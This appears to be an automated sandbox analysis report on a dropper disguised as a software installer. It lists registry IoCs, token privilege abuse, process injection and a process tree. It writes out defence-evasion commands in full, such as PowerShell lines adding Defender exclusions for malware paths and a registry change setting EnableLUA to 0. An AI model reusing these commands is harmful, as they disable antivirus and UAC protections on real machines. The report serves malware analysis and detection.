Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\	Process not Found

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3508	powershell.exe
3508	powershell.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe
3668	Sun15dbd675f871ca.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3220	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
5876	lLzbYb05wpviAC5_QBoVEjy7.exe

Suspicious behavior: SetClipboardViewer 2 IoCs

pid	Process
4552	6563257.scr
6272	4385520.scr

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSystemtimePrivilege	2996	svchost.exe
Token: SeSystemtimePrivilege	2996	svchost.exe
Token: SeIncBasePriorityPrivilege	2996	svchost.exe
Token: SeCreateTokenPrivilege	2644	Sun15901f2f025e.exe
Token: SeAssignPrimaryTokenPrivilege	2644	Sun15901f2f025e.exe
Token: SeLockMemoryPrivilege	2644	Sun15901f2f025e.exe
Token: SeIncreaseQuotaPrivilege	2644	Sun15901f2f025e.exe
Token: SeMachineAccountPrivilege	2644	Sun15901f2f025e.exe
Token: SeTcbPrivilege	2644	Sun15901f2f025e.exe
Token: SeSecurityPrivilege	2644	Sun15901f2f025e.exe
Token: SeTakeOwnershipPrivilege	2644	Sun15901f2f025e.exe
Token: SeLoadDriverPrivilege	2644	Sun15901f2f025e.exe
Token: SeSystemProfilePrivilege	2644	Sun15901f2f025e.exe
Token: SeSystemtimePrivilege	2644	Sun15901f2f025e.exe
Token: SeProfSingleProcessPrivilege	2644	Sun15901f2f025e.exe
Token: SeIncBasePriorityPrivilege	2644	Sun15901f2f025e.exe
Token: SeCreatePagefilePrivilege	2644	Sun15901f2f025e.exe
Token: SeCreatePermanentPrivilege	2644	Sun15901f2f025e.exe
Token: SeBackupPrivilege	2644	Sun15901f2f025e.exe
Token: SeRestorePrivilege	2644	Sun15901f2f025e.exe
Token: SeShutdownPrivilege	2644	Sun15901f2f025e.exe
Token: SeDebugPrivilege	2644	Sun15901f2f025e.exe
Token: SeAuditPrivilege	2644	Sun15901f2f025e.exe
Token: SeSystemEnvironmentPrivilege	2644	Sun15901f2f025e.exe
Token: SeChangeNotifyPrivilege	2644	Sun15901f2f025e.exe
Token: SeRemoteShutdownPrivilege	2644	Sun15901f2f025e.exe
Token: SeUndockPrivilege	2644	Sun15901f2f025e.exe
Token: SeSyncAgentPrivilege	2644	Sun15901f2f025e.exe
Token: SeEnableDelegationPrivilege	2644	Sun15901f2f025e.exe
Token: SeManageVolumePrivilege	2644	Sun15901f2f025e.exe
Token: SeImpersonatePrivilege	2644	Sun15901f2f025e.exe
Token: SeCreateGlobalPrivilege	2644	Sun15901f2f025e.exe
Token: 31	2644	Sun15901f2f025e.exe
Token: 32	2644	Sun15901f2f025e.exe
Token: 33	2644	Sun15901f2f025e.exe
Token: 34	2644	Sun15901f2f025e.exe
Token: 35	2644	Sun15901f2f025e.exe
Token: SeDebugPrivilege	5004	Sun152e52d07b74d9b5.exe
Token: SeDebugPrivilege	3192	Sun15f67075f27a2b5b.exe
Token: SeDebugPrivilege	3508	powershell.exe
Token: SeDebugPrivilege	4244	taskkill.exe
Token: SeRestorePrivilege	3704	WerFault.exe
Token: SeBackupPrivilege	3704	WerFault.exe
Token: SeBackupPrivilege	3704	WerFault.exe
Token: SeDebugPrivilege	2288	2444570.scr
Token: SeDebugPrivilege	2620	TJ1IiWlmJ3sbL_hCLrYApLdL.exe
Token: SeDebugPrivilege	4140	4791890.scr
Token: SeCreateTokenPrivilege	5432	Q3x6p3_Ppyweai0cdzWrKdTO.exe
Token: SeAssignPrimaryTokenPrivilege	5432	Q3x6p3_Ppyweai0cdzWrKdTO.exe
Token: SeLockMemoryPrivilege	5432	Q3x6p3_Ppyweai0cdzWrKdTO.exe
Token: SeIncreaseQuotaPrivilege	5432	Q3x6p3_Ppyweai0cdzWrKdTO.exe
Token: SeMachineAccountPrivilege	5432	Q3x6p3_Ppyweai0cdzWrKdTO.exe
Token: SeTcbPrivilege	5432	Q3x6p3_Ppyweai0cdzWrKdTO.exe
Token: SeSecurityPrivilege	5432	Q3x6p3_Ppyweai0cdzWrKdTO.exe
Token: SeTakeOwnershipPrivilege	5432	Q3x6p3_Ppyweai0cdzWrKdTO.exe
Token: SeLoadDriverPrivilege	5432	Q3x6p3_Ppyweai0cdzWrKdTO.exe
Token: SeSystemProfilePrivilege	5432	Q3x6p3_Ppyweai0cdzWrKdTO.exe
Token: SeSystemtimePrivilege	5432	Q3x6p3_Ppyweai0cdzWrKdTO.exe
Token: SeProfSingleProcessPrivilege	5432	Q3x6p3_Ppyweai0cdzWrKdTO.exe
Token: SeIncBasePriorityPrivilege	5432	Q3x6p3_Ppyweai0cdzWrKdTO.exe
Token: SeCreatePagefilePrivilege	5432	Q3x6p3_Ppyweai0cdzWrKdTO.exe
Token: SeCreatePermanentPrivilege	5432	Q3x6p3_Ppyweai0cdzWrKdTO.exe
Token: SeBackupPrivilege	5432	Q3x6p3_Ppyweai0cdzWrKdTO.exe
Token: SeRestorePrivilege	5432	Q3x6p3_Ppyweai0cdzWrKdTO.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3476	setup.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4768 wrote to memory of 2120	4768	setup_x86_x64_install.exe	85
PID 4768 wrote to memory of 2120	4768	setup_x86_x64_install.exe	85
PID 4768 wrote to memory of 2120	4768	setup_x86_x64_install.exe	85
PID 2120 wrote to memory of 2564	2120	setup_installer.exe	86
PID 2120 wrote to memory of 2564	2120	setup_installer.exe	86
PID 2120 wrote to memory of 2564	2120	setup_installer.exe	86
PID 2564 wrote to memory of 2060	2564	setup_install.exe	90
PID 2564 wrote to memory of 2060	2564	setup_install.exe	90
PID 2564 wrote to memory of 2060	2564	setup_install.exe	90
PID 2564 wrote to memory of 2264	2564	setup_install.exe	91
PID 2564 wrote to memory of 2264	2564	setup_install.exe	91
PID 2564 wrote to memory of 2264	2564	setup_install.exe	91
PID 2564 wrote to memory of 1724	2564	setup_install.exe	92
PID 2564 wrote to memory of 1724	2564	setup_install.exe	92
PID 2564 wrote to memory of 1724	2564	setup_install.exe	92
PID 2564 wrote to memory of 4940	2564	setup_install.exe	93
PID 2564 wrote to memory of 4940	2564	setup_install.exe	93
PID 2564 wrote to memory of 4940	2564	setup_install.exe	93
PID 2564 wrote to memory of 4432	2564	setup_install.exe	94
PID 2564 wrote to memory of 4432	2564	setup_install.exe	94
PID 2564 wrote to memory of 4432	2564	setup_install.exe	94
PID 2564 wrote to memory of 4436	2564	setup_install.exe	96
PID 2564 wrote to memory of 4436	2564	setup_install.exe	96
PID 2564 wrote to memory of 4436	2564	setup_install.exe	96
PID 2564 wrote to memory of 2924	2564	setup_install.exe	95
PID 2564 wrote to memory of 2924	2564	setup_install.exe	95
PID 2564 wrote to memory of 2924	2564	setup_install.exe	95
PID 2564 wrote to memory of 2604	2564	setup_install.exe	97
PID 2564 wrote to memory of 2604	2564	setup_install.exe	97
PID 2564 wrote to memory of 2604	2564	setup_install.exe	97
PID 2564 wrote to memory of 2880	2564	setup_install.exe	98
PID 2564 wrote to memory of 2880	2564	setup_install.exe	98
PID 2564 wrote to memory of 2880	2564	setup_install.exe	98
PID 2564 wrote to memory of 2948	2564	setup_install.exe	104
PID 2564 wrote to memory of 2948	2564	setup_install.exe	104
PID 2564 wrote to memory of 2948	2564	setup_install.exe	104
PID 2060 wrote to memory of 3508	2060	cmd.exe	102
PID 2060 wrote to memory of 3508	2060	cmd.exe	102
PID 2060 wrote to memory of 3508	2060	cmd.exe	102
PID 1724 wrote to memory of 2644	1724	cmd.exe	103
PID 1724 wrote to memory of 2644	1724	cmd.exe	103
PID 1724 wrote to memory of 2644	1724	cmd.exe	103
PID 4940 wrote to memory of 3668	4940	cmd.exe	101
PID 4940 wrote to memory of 3668	4940	cmd.exe	101
PID 4940 wrote to memory of 3668	4940	cmd.exe	101
PID 4432 wrote to memory of 3192	4432	cmd.exe	100
PID 4432 wrote to memory of 3192	4432	cmd.exe	100
PID 2564 wrote to memory of 3712	2564	setup_install.exe	99
PID 2564 wrote to memory of 3712	2564	setup_install.exe	99
PID 2564 wrote to memory of 3712	2564	setup_install.exe	99
PID 4436 wrote to memory of 4136	4436	cmd.exe	106
PID 4436 wrote to memory of 4136	4436	cmd.exe	106
PID 4436 wrote to memory of 4136	4436	cmd.exe	106
PID 2564 wrote to memory of 4328	2564	setup_install.exe	105
PID 2564 wrote to memory of 4328	2564	setup_install.exe	105
PID 2564 wrote to memory of 4328	2564	setup_install.exe	105
PID 2924 wrote to memory of 2216	2924	cmd.exe	109
PID 2924 wrote to memory of 2216	2924	cmd.exe	109
PID 2924 wrote to memory of 2216	2924	cmd.exe	109
PID 2604 wrote to memory of 4912	2604	cmd.exe	110
PID 2604 wrote to memory of 4912	2604	cmd.exe	110
PID 2604 wrote to memory of 4912	2604	cmd.exe	110
PID 2880 wrote to memory of 1996	2880	cmd.exe	107
PID 2880 wrote to memory of 1996	2880	cmd.exe	107

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	4209305.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	1059307.scr
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	lJZRHUqsNBAxAKw1EXpXsAbv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	3645252.scr

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4768
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2120
- - C:\Users\Admin\AppData\Local\Temp\7zS848924F3\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS848924F3\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2564
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2060
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3508
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun152bab5a2de.exe
      4⤵
      PID:2264
    - - C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun152bab5a2de.exe
        
        Sun152bab5a2de.exe
        5⤵
        Executes dropped EXE
        
        PID:2340
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun15901f2f025e.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1724
    - - C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun15901f2f025e.exe
        
        Sun15901f2f025e.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2644
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1912
        6⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:3940
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun15dbd675f871ca.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4940
    - - C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun15dbd675f871ca.exe
        
        Sun15dbd675f871ca.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3668
      - C:\Users\Admin\Pictures\Adobe Films\Q_tbQAON4zee4WZgnXDMoQyQ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Q_tbQAON4zee4WZgnXDMoQyQ.exe"
        6⤵
        Executes dropped EXE
        
        PID:468
      - C:\Users\Admin\Pictures\Adobe Films\R08xH9BCP1lPnAzjfZi8v2li.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\R08xH9BCP1lPnAzjfZi8v2li.exe"
        6⤵
        Executes dropped EXE
        
        PID:1896
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 300
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5220
      - C:\Users\Admin\Pictures\Adobe Films\lLzbYb05wpviAC5_QBoVEjy7.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\lLzbYb05wpviAC5_QBoVEjy7.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5576
        
        C:\Users\Admin\Pictures\Adobe Films\lLzbYb05wpviAC5_QBoVEjy7.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\lLzbYb05wpviAC5_QBoVEjy7.exe"
        7⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:5876
      - C:\Users\Admin\Pictures\Adobe Films\Q3x6p3_Ppyweai0cdzWrKdTO.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Q3x6p3_Ppyweai0cdzWrKdTO.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5432
      - C:\Users\Admin\Pictures\Adobe Films\6cMNaNz6xs8uOfpzArASoKEi.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\6cMNaNz6xs8uOfpzArASoKEi.exe"
        6⤵
        Executes dropped EXE
        
        PID:5480
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 276
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6640
      - C:\Users\Admin\Pictures\Adobe Films\und2L3xwxwEHAWOOJXId1Mpg.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\und2L3xwxwEHAWOOJXId1Mpg.exe"
        6⤵
        
        PID:1000
        
        C:\ProgramData\build.exe
        
        "C:\ProgramData\build.exe"
        7⤵
        
        PID:5292
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 2060
        8⤵
        Program crash
        
        PID:2828
      - C:\Users\Admin\Pictures\Adobe Films\vybwnpLczODZizIBf8geRxV_.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\vybwnpLczODZizIBf8geRxV_.exe"
        6⤵
        Executes dropped EXE
        
        PID:2160
        
        C:\Users\Admin\AppData\Roaming\5327978.scr
        
        "C:\Users\Admin\AppData\Roaming\5327978.scr" /S
        7⤵
        
        PID:5340
        
        C:\Users\Admin\AppData\Roaming\4385520.scr
        
        "C:\Users\Admin\AppData\Roaming\4385520.scr" /S
        7⤵
        Suspicious behavior: SetClipboardViewer
        
        PID:6272
        
        C:\Users\Admin\AppData\Roaming\3392110.scr
        
        "C:\Users\Admin\AppData\Roaming\3392110.scr" /S
        7⤵
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:6928
        
        C:\Users\Admin\AppData\Roaming\3645252.scr
        
        "C:\Users\Admin\AppData\Roaming\3645252.scr" /S
        7⤵
        Windows security modification
        Checks whether UAC is enabled
        Suspicious use of SetThreadContext
        System policy modification
        
        PID:7052
        
        C:\Users\Admin\AppData\Local\Temp\5feb0322-1e56-4cc0-bab0-c9ce73d70666\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5feb0322-1e56-4cc0-bab0-c9ce73d70666\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5feb0322-1e56-4cc0-bab0-c9ce73d70666\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        8⤵
        
        PID:5796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\3645252.scr" -Force
        8⤵
        Blocklisted process makes network request
        Executes dropped EXE
        
        PID:2988
        
        C:\Users\Admin\AppData\Roaming\3645252.scr
        
        "C:\Users\Admin\AppData\Roaming\3645252.scr"
        8⤵
        
        PID:6868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\3645252.scr" -Force
        8⤵
        
        PID:6788
        
        C:\Users\Admin\AppData\Roaming\3645252.scr
        
        "C:\Users\Admin\AppData\Roaming\3645252.scr"
        8⤵
        
        PID:6516
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7052 -s 2496
        8⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5608
        
        C:\Users\Admin\AppData\Roaming\2450279.scr
        
        "C:\Users\Admin\AppData\Roaming\2450279.scr" /S
        7⤵
        
        PID:6016
      - C:\Users\Admin\Pictures\Adobe Films\VrhYZyTUFiHxx9ufigih5dzd.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\VrhYZyTUFiHxx9ufigih5dzd.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5232
      - C:\Users\Admin\Pictures\Adobe Films\O4pPWuoP96KUANHjZGFW5DTt.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\O4pPWuoP96KUANHjZGFW5DTt.exe"
        6⤵
        Executes dropped EXE
        
        PID:1876
      - C:\Users\Admin\Pictures\Adobe Films\7UXcpESJJu1f6oCuDC4HeQI4.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\7UXcpESJJu1f6oCuDC4HeQI4.exe"
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:3792
        
        C:\Program Files (x86)\Company\NewProduct\inst3.exe
        
        "C:\Program Files (x86)\Company\NewProduct\inst3.exe"
        7⤵
        
        PID:6176
        
        C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
        
        "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
        7⤵
        
        PID:6168
        
        C:\Program Files (x86)\Company\NewProduct\cm3.exe
        
        "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
        7⤵
        
        PID:6160
      - C:\Users\Admin\Pictures\Adobe Films\lJZRHUqsNBAxAKw1EXpXsAbv.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\lJZRHUqsNBAxAKw1EXpXsAbv.exe"
        6⤵
        Executes dropped EXE
        Windows security modification
        Checks whether UAC is enabled
        Suspicious use of SetThreadContext
        System policy modification
        
        PID:2548
        
        C:\Users\Admin\AppData\Local\Temp\774b2033-7b62-4987-b037-91a78997dd88\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\774b2033-7b62-4987-b037-91a78997dd88\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\774b2033-7b62-4987-b037-91a78997dd88\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        7⤵
        
        PID:1100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\774b2033-7b62-4987-b037-91a78997dd88\test.bat"
        8⤵
        
        PID:4256
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\lJZRHUqsNBAxAKw1EXpXsAbv.exe" -Force
        7⤵
        
        PID:5508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\lJZRHUqsNBAxAKw1EXpXsAbv.exe" -Force
        7⤵
        
        PID:5996
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Executes dropped EXE
        
        PID:2544
        
        C:\Users\Admin\Pictures\Adobe Films\lJZRHUqsNBAxAKw1EXpXsAbv.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\lJZRHUqsNBAxAKw1EXpXsAbv.exe"
        7⤵
        
        PID:792
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2548 -s 2596
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:7152
      - C:\Users\Admin\Pictures\Adobe Films\SLvkfBa1xXavhXchZs1OMNTN.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\SLvkfBa1xXavhXchZs1OMNTN.exe"
        6⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Executes dropped EXE
        
        PID:1548
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 276
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:7108
      - C:\Users\Admin\Pictures\Adobe Films\ziwapD8GNIFEgwzhGXQcvcaW.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\ziwapD8GNIFEgwzhGXQcvcaW.exe"
        6⤵
        Executes dropped EXE
        
        PID:4544
      - C:\Users\Admin\Pictures\Adobe Films\uF4BWdwhJtrCLd15_CKd5bGb.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\uF4BWdwhJtrCLd15_CKd5bGb.exe"
        6⤵
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5640
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        Executes dropped EXE
        
        PID:1000
      - C:\Users\Admin\Pictures\Adobe Films\VxMgZLfaPN2cCgNt7X4dGKQw.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\VxMgZLfaPN2cCgNt7X4dGKQw.exe"
        6⤵
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5468
      - C:\Users\Admin\Pictures\Adobe Films\jyhpR_SJFKvH936H2xPDy9SC.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\jyhpR_SJFKvH936H2xPDy9SC.exe"
        6⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        
        PID:5712
        
        C:\Users\Admin\Pictures\Adobe Films\jyhpR_SJFKvH936H2xPDy9SC.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\jyhpR_SJFKvH936H2xPDy9SC.exe"
        7⤵
        
        PID:2556
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 2020
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:3500
      - C:\Users\Admin\Pictures\Adobe Films\TJ1IiWlmJ3sbL_hCLrYApLdL.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\TJ1IiWlmJ3sbL_hCLrYApLdL.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2620
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2620 -s 268
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6712
      - C:\Users\Admin\Pictures\Adobe Films\pa82Er1J_F7R9hqG4Jsv9miU.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\pa82Er1J_F7R9hqG4Jsv9miU.exe"
        6⤵
        Executes dropped EXE
        
        PID:1944
      - C:\Users\Admin\Pictures\Adobe Films\Lb9e4kTqLaq5H6w5s875gGZL.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Lb9e4kTqLaq5H6w5s875gGZL.exe"
        6⤵
        
        PID:4668
        
